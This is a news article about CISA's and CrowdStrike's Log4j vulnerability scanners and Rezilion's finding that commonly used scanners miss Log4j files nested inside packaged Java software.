Multiple Log4j scanners released by CISA, CrowdStrike

Many Log4J scanners are available, but researchers say a number of them have blindspots.
Written by Jonathan Greig, Contributor

CISA released its own Log4J scanner this week alongside a host of other scanners published by cybersecurity companies and researchers. 

The open-sourced Log4j scanner is derived from scanners created by other members of the open source community, and it is designed to help organizations identify potentially vulnerable web services affected by the Log4j vulnerabilities. 

CISA said it modified a Log4J scanner created by security company FullHunt and got help from other researchers like Philipp Klaus and Moritz Bechler. 

The repository provides a scanning solution for CVE-2021-44228 and CVE-2021-45046. CISA said it supports DNS callback for vulnerability discovery and validation while providing fuzzing for HTTP POST Data parameters, fuzzing for JSON data parameters, and support for lists of URLs. 

It also features WAF Bypass payloads and fuzzing for more than 60 HTTP request headers.

CrowdStrike similarly released its own free Log4J scanner called the CrowdStrike Archive Scan Tool, or "CAST." 

Yotam Perkal, vulnerability research lead at Rezilion, did a test of some of the Log4J scanners, finding that many were unable to find all instances of the vulnerability. 


"The biggest challenge lies in detecting Log4Shell within packaged software in production environments: Java files (such as Log4j) can be nested a few layers deep into other files – which means that a shallow search for the file won't find it," Perkal said. "Furthermore, they may be packaged in many different formats which creates a real challenge in digging them inside other Java packages."

Rezilion tested the nine scanners most commonly used by developers and IT teams against a dataset of packaged Java files where Log4j was nested and packaged in various formats.

Perkal said that while some scanners did better than others, none were able to detect all formats. According to Perkal, the research illustrates "the limitations of static scanning in detecting Log4j instances."

"It also reminds us that detection abilities are only as good as your detection method. Scanners have blindspots," Perkal explained. 

"Security leaders cannot blindly assume that various open source or even commercial-grade tools will be able to detect every edge case. And in the case of Log4j, there are a lot of edge instances in many places."

Editorial standards